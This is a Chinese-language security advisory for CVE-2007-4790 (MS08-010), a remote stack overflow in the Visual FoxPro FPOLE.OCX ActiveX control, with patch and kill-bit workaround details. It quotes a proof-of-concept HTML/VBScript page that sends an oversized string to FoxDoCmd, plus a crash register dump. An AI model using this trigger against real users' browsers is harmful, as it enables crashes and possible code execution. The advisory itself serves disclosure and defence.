安全研究
安全漏洞
Microsoft Visual FoxPro FPOLE.OCX ActiveX控件远程栈溢出漏洞(MS08-010)
发布日期:2007-09-06
更新日期:2008-02-19
受影响系统:
Microsoft Internet Explorer 7.0描述:
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
Microsoft Visual FoxPro 6.0
BUGTRAQ ID: 25571
CVE(CAN) ID: CVE-2007-4790
Visual FoxPro是微软发布的数据库开发工具。
Visual FoxPro的AcitveX控件实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制用户系统。
Visual FoxPro的Foxtlib.ocx和fpole.ocx ActiveX控件没有正确地验证对FoxDoCmd()方式的输入,如果用户受骗访问了恶意站点,就可能触发栈溢出,导致在用户浏览器会话中执行任意指令。
<*来源:shinnai (shinnai@autistici.org)
链接:http://secunia.com/advisories/27165/
http://www.microsoft.com/technet/security/Bulletin/MS08-010.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA08-043C.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------------------------------------
<b>0-day: Microsoft Visual FoxPro 6.0 fpole 1.0 Type Library (FPOLE.OCX v. 6.0.8450.0) Remote Stack Overflow</b>
url: http://www.microsoft.com
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
This control is marked as:
<b>RegKey Safe for Script: Falso
RegKey Safe for Init: Falso
Implements IObjectSafety: Vero
IDisp Safe: Safe for untrusted: caller
KillBitSet: Falso</b>
This is a dump:
<b>registers:
EAX 000287C4
ECX 017923C8
EDX 017FC60D ASCII "bbbbbbbbbbbb..."
EBX 04E51ED8
ESP 017FC3C0
EBP 017FC5FC
ESI 000493E1
EDI 7C80BDB6 kernel32.lstrlenA
EIP 04E46807 FPOLE.04E46807
*********************************************
stack:
[...]
017FC60C |62626262
017FC610 |62626262
017FC614 |62626262
017FC618 |62626262
017FC61C |62626262
[...]</b>
so I think code execution is possible even if, in this moment of my life, I really have no time to
investigate :)
-----------------------------------------------------------------------------------------------------------
<object classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language = 'vbscript'>
Sub tryMe()
buff = String(300000, "b")
test.FoxDoCmd buff, 1
End Sub
</script>
</span></span>
</code></pre>
建议:
临时解决方法:
* 禁止尝试在Internet Explorer中运行COM对象,将以下文本粘贴于记事本等文本编辑器中。然后,使用.reg文件扩展名保存文件并双击导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{EF28418F-FFB2-11D0-861A-00A0C903A97F}]
"Compatibility Flags"=dword:00000400
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS08-010)以及相应补丁:
MS08-010:Cumulative Security Update for Internet Explorer (944533)
链接:http://www.microsoft.com/technet/security/Bulletin/MS08-010.mspx?pf=true
浏览次数:2796
严重程度:0(网友投票)
绿盟科技给您安全的保障